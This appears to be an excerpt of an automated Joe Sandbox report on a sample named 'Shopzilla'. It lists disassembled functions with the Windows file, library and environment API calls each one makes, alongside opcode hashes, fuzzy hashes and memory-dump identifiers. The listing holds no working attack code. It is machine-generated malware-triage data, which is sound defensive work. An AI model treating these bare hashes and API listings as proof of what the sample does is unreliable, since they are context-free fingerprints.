                                              • Opcode ID: a96bb78f253f2d9965abf01413b9f386b327557c6e15560b7ebdd454b2d8319c
                                              • Instruction ID: 42407c72a4dd43267b8d54ac8c87763256399857fccf39eedc6168f40f4324f0
                                              • Opcode Fuzzy Hash: a96bb78f253f2d9965abf01413b9f386b327557c6e15560b7ebdd454b2d8319c
                                              • Instruction Fuzzy Hash: D14116B4508341DFDB24DF14C494B1ABBE1BF45308F0989ACE8995B362D335EC85CB92
                                              APIs
                                                • Part of subcall function 00BB4B29: FreeLibrary.KERNEL32(00000000,?), ref: 00BB4B63
                                                • Part of subcall function 00BC53AB: __wfsopen.LIBCMT ref: 00BC53B6
                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00BB27AF,?,00000001), ref: 00BB49F4
                                                • Part of subcall function 00BB4ADE: FreeLibrary.KERNEL32(00000000), ref: 00BB4B18
                                                • Part of subcall function 00BB48B0: _memmove.LIBCMT ref: 00BB48FA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Library$Free$Load__wfsopen_memmove
                                              • String ID:
                                              • API String ID: 1396898556-0
                                              • Opcode ID: 7140a285e5608a3dfe229f55be9b0dbd297367045e262ff2c168b658d0b6fbc9
                                              • Instruction ID: d9cc84b1128d3ad340b2deec45fa90e21320c9ffbef3d27d746e4a19e11d1ae8
                                              • Opcode Fuzzy Hash: 7140a285e5608a3dfe229f55be9b0dbd297367045e262ff2c168b658d0b6fbc9
                                              • Instruction Fuzzy Hash: DF11C432650609ABCB10BB708C52FFE77E9EF40701F1084ADF581A6183EBB19A15AB94
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ClearVariant
                                              • String ID:
                                              • API String ID: 1473721057-0
                                              • Opcode ID: d7249ae213d49fb3a214b5bb3b2a15bf3c0396259b9d68c1e563e7dbf2f75eee
                                              • Instruction ID: 0b791fb2ab5595713c4bd623eef38765e3107143ea05d3f635abea6cfa384a20
                                              • Opcode Fuzzy Hash: d7249ae213d49fb3a214b5bb3b2a15bf3c0396259b9d68c1e563e7dbf2f75eee
                                              • Instruction Fuzzy Hash: 562105B4508301DFDB24DF54C494B5ABBE1BF85304F0989ACF88A5B362D731E849CBA2
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00BB3CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00BB4276
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 93363e376f0b4d485be19421ac3811be67989aafdbd7c87403e13f277bf14997
                                              • Instruction ID: e7c96b3eb4b43a3bcf291d1bcd376cf2e42c7771c98eb8912a9856512996f060
                                              • Opcode Fuzzy Hash: 93363e376f0b4d485be19421ac3811be67989aafdbd7c87403e13f277bf14997
                                              • Instruction Fuzzy Hash: DA113A31210B019FD720CF59C580BA6B7F5FF88710F10C96DE8AA86A51D7B0E845EB60
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: dd033a4b5f62ccebfd9eaf5dbbb8866036393a442bcaa3bfcd9f8478fa996b83
                                              • Instruction ID: 9ba4f91e177e294088beb3a03a0eac6107c36de70128de49db631bc4c2627d44
                                              • Opcode Fuzzy Hash: dd033a4b5f62ccebfd9eaf5dbbb8866036393a442bcaa3bfcd9f8478fa996b83
                                              • Instruction Fuzzy Hash: 8C01D672211701AFD3245F28DC02FB7BBE8DB447A0F50896EF56ACA1D1EA71F4408A90
                                              APIs
                                              • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00C1477C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: EnvironmentVariable
                                              • String ID:
                                              • API String ID: 1431749950-0
                                              • Opcode ID: e885b5c7d0c8e379fe490c27f082a3d2acdb3c605b1bb4d401c4ad55a835f102
                                              • Instruction ID: 8848f298febc492a746f636083e39868667b50e5aa533538183c3f213e76708f
                                              • Opcode Fuzzy Hash: e885b5c7d0c8e379fe490c27f082a3d2acdb3c605b1bb4d401c4ad55a835f102
                                              • Instruction Fuzzy Hash: CFF03131618104AF9B14FB65D846D9F77F8EF46320B1041A9F4049B261DF71BD81D7A1
                                              APIs
                                                • Part of subcall function 00BC0F16: std::exception::exception.LIBCMT ref: 00BC0F4C
                                                • Part of subcall function 00BC0F16: __CxxThrowException@8.LIBCMT ref: 00BC0F61
                                              • _memset.LIBCMT ref: 00C07B21
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw_memsetstd::exception::exception
                                              • String ID:
                                              • API String ID: 525207782-0
                                              • Opcode ID: e42b1121e6369a617172214c458a3cdaa519a43f438b417090ec007e3c826baf
                                              • Instruction ID: 62a1232443da853ac5aa05c28cec3ced623446c6a4061f94346f3f82a490c014
                                              • Opcode Fuzzy Hash: e42b1121e6369a617172214c458a3cdaa519a43f438b417090ec007e3c826baf
                                              • Instruction Fuzzy Hash: 9D01F674604204DFD325EF5CD441F06BBE5AF59310F24849EF5888B3A2DB72E841CB90
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _fseek
                                              • String ID:
                                              • API String ID: 2937370855-0
                                              • Opcode ID: 0a4098fbca966de150df0e901f011b960a22b5df12848eeca8f12985b6aae40b
                                              • Instruction ID: 9e563bdacad924f89839f9cf637b68c50f734dd7a3b69c1ee2d21ca6bdc00ff3
                                              • Opcode Fuzzy Hash: 0a4098fbca966de150df0e901f011b960a22b5df12848eeca8f12985b6aae40b
                                              • Instruction Fuzzy Hash: 72F085B6400208BFCF109F84DC00DEBBBB9EB85320F00419CF9045A221D272EA25DBA0
                                              APIs
                                              • FreeLibrary.KERNEL32(?,?,?,00BB27AF,?,00000001), ref: 00BB4A63
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID:
                                              • API String ID: 3664257935-0
                                              • Opcode ID: f35547a3d23bd880c7bcac15721744c15a8b6b280b9dc4015f1775506d34ef47
                                              • Instruction ID: 5466bed8aafd627dbba83cdc7325bfdc21546301c5644c0a0de9dabd014963d1
                                              • Opcode Fuzzy Hash: f35547a3d23bd880c7bcac15721744c15a8b6b280b9dc4015f1775506d34ef47
                                              • Instruction Fuzzy Hash: 4EF01571145701CFCB349F64E8908AABBF0FF143263208AAEE5D683612C7B1A884DF44
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __fread_nolock
                                              • String ID:
                                              • API String ID: 2638373210-0
                                              • Opcode ID: c46de0973e4316ba83ebc5d8e55475f12f35eb36bfefe38a98de0559b640b685
                                              • Instruction ID: 625ff0b437bc7a1f25902a7a2d3f3633e5a3acb14801d3f3852939877438fecc
                                              • Opcode Fuzzy Hash: c46de0973e4316ba83ebc5d8e55475f12f35eb36bfefe38a98de0559b640b685
                                              • Instruction Fuzzy Hash: 59F0F87250020DFFDF05DF94C941EAABBB9FB14314F208589F9148B252D336EA61AB91
                                              APIs
                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BC090F
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: LongNamePath_memmove
                                              • String ID:
                                              • API String ID: 2514874351-0
                                              • Opcode ID: db7c38b17b3aa778dab70696606c8eec3017eab0a6672fed982bf0191cc85e14
                                              • Instruction ID: 6905edfa54c423843ff8f8d04d7056e9d8ac793d05723f7f3540fd5d92ea3272
                                              • Opcode Fuzzy Hash: db7c38b17b3aa778dab70696606c8eec3017eab0a6672fed982bf0191cc85e14
                                              • Instruction Fuzzy Hash: 99E08632A011285BC721D69C9C15FEEB7DDEB88690F0401F6FD09D7314D9605C8186D1
                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00C04B9E
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FolderPath_memmove
                                              • String ID:
                                              • API String ID: 3334745507-0
                                              • Opcode ID: f0d978d9eac8d76c646d24ade64423763e314790a1fd52a5da496ba4938d16b1
                                              • Instruction ID: 0e49a922a258b7b88631063a730ef1711cae9aa8ca46ea9bfd39c0b3e894d043
                                              • Opcode Fuzzy Hash: f0d978d9eac8d76c646d24ade64423763e314790a1fd52a5da496ba4938d16b1
                                              • Instruction Fuzzy Hash: B1D05EB291032C6BDB60E6A89C0DEFB7BACE744220F000AE17C9CC3101E9649D4586E0
                                              APIs
                                                • Part of subcall function 00C036B9: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00C037C6,00000000,00000000,?,00BF055B,00C56590,00000002,?,?), ref: 00C03737
                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,00000000,00000000,?,00BF055B,00C56590,00000002,?,?,?,00000000), ref: 00C037D4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: File$PointerWrite
                                              • String ID:
                                              • API String ID: 539440098-0
                                              • Opcode ID: d455cf58a6db38d25b71cdcac7546ba2f6e84ae7c3410f08e7e60c08344163d5
                                              • Instruction ID: 0eca341b6ac7e63ea4c012d46539cca213fa65557b6c64aa5ea2f0f88c896acc
                                              • Opcode Fuzzy Hash: d455cf58a6db38d25b71cdcac7546ba2f6e84ae7c3410f08e7e60c08344163d5
                                              • Instruction Fuzzy Hash: 2DE0B636410218BBDB20AF94D805B9AB7BDEB05320F10465AFE4096151DBB2AE64EBE5
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00BE2EBB), ref: 00BB42EF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotification
                                              • String ID:
                                              • API String ID: 2591292051-0
                                              • Opcode ID: 01f1914b6bd95643c89cd6c518006eb860a0741a85c4cfd7aba244cbf26a69f9
                                              • Instruction ID: 558be22771fdc2f8ead66d28908ce2e4df5c21d78e1bb7705326840537f5cd3c
                                              • Opcode Fuzzy Hash: 01f1914b6bd95643c89cd6c518006eb860a0741a85c4cfd7aba244cbf26a69f9
                                              • Instruction Fuzzy Hash: F7E0BD79410B01CFC7314F1AE8044A6FBF8FFE13713214A6EE0E692660D3B0589AEB90
                                              APIs
                                              • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00C03CEA,?,?,?), ref: 00C03D7A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CopyFile
                                              • String ID:
                                              • API String ID: 1304948518-0
                                              • Opcode ID: a18b7e850dec5fe7dd2eb19eb728bb399fde682364e7c80863276506f71950c6
                                              • Instruction ID: 3f90605bfc281d75f8bbc06f4fb21d5576099c809708b3530152dc2d9bb4c41a
                                              • Opcode Fuzzy Hash: a18b7e850dec5fe7dd2eb19eb728bb399fde682364e7c80863276506f71950c6
                                              • Instruction Fuzzy Hash: F3D0A7315E020CBBEF50DFA0CC06F69B7ACE701706F2002A4B904D90E0DA7669149795
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00BF0666,00000000,00000000,00000000), ref: 00BB42BF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: cf6e438e6390f898bf19593307854e88e4e946c4a2c2637c830912840dfa7aee
                                              • Instruction ID: f2769669dd840e11cd513f53c865413ef301cea99f066ea155e287a23ad14d6f
                                              • Opcode Fuzzy Hash: cf6e438e6390f898bf19593307854e88e4e946c4a2c2637c830912840dfa7aee
                                              • Instruction Fuzzy Hash: 63D0C97565020CBFEB10CB80DC46FAEBBBCEB05710F200294FE04A6290E6B27E508B95
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00C03A6B), ref: 00C04E5A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: e0b809596a78df66469c20335421e68aedcc387fbf8f157fd7405a66802eaf87
                                              • Instruction ID: e554252078a9a3028794d6aee617b43b0aa3a6a7b6a96c12145f8cf143009035
                                              • Opcode Fuzzy Hash: e0b809596a78df66469c20335421e68aedcc387fbf8f157fd7405a66802eaf87
                                              • Instruction Fuzzy Hash: DEB092B401060046DD6C0A78991829E73086B827E9FF81B80D9B4858E282398D5BE610
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: __wfsopen
                                              • String ID:
                                              • API String ID: 197181222-0
                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction ID: 9a1ccdf9a04f428e617c230cf90913dfdfc957e892c3bc90894afa60940af919
                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                              • Instruction Fuzzy Hash: 5CB0927644024C77CE112A82EC02F493B599B806A8F408060FB0C18162A6B7B6A09689
                                              APIs
                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00C0D6AF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ErrorLast
                                              • String ID:
                                              • API String ID: 1452528299-0
                                              • Opcode ID: b6c19b4c05dadd8740c26c46021601dd0ff7e72fc387e0c9886499c5bfd75550
                                              • Instruction ID: 1325d623b791de44eb0a738e583810aa1fd4fd8e61b438efc719c10fcc38e34e
                                              • Opcode Fuzzy Hash: b6c19b4c05dadd8740c26c46021601dd0ff7e72fc387e0c9886499c5bfd75550
                                              • Instruction Fuzzy Hash: 387182746083028FC714EF68C491AAEB7E4EF85314F444A6DF9968B2E1DB70EE45CB52
                                              APIs
                                                • Part of subcall function 00C03E72: FindFirstFileW.KERNELBASE(?,?), ref: 00C03EE9
                                                • Part of subcall function 00C03E72: DeleteFileW.KERNEL32(?,?,?,?), ref: 00C03F39
                                                • Part of subcall function 00C03E72: FindNextFileW.KERNEL32(00000000,00000010), ref: 00C03F4A
                                                • Part of subcall function 00C03E72: FindClose.KERNEL32(00000000), ref: 00C03F61
                                              • GetLastError.KERNEL32 ref: 00C0C0FF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 2191629493-0
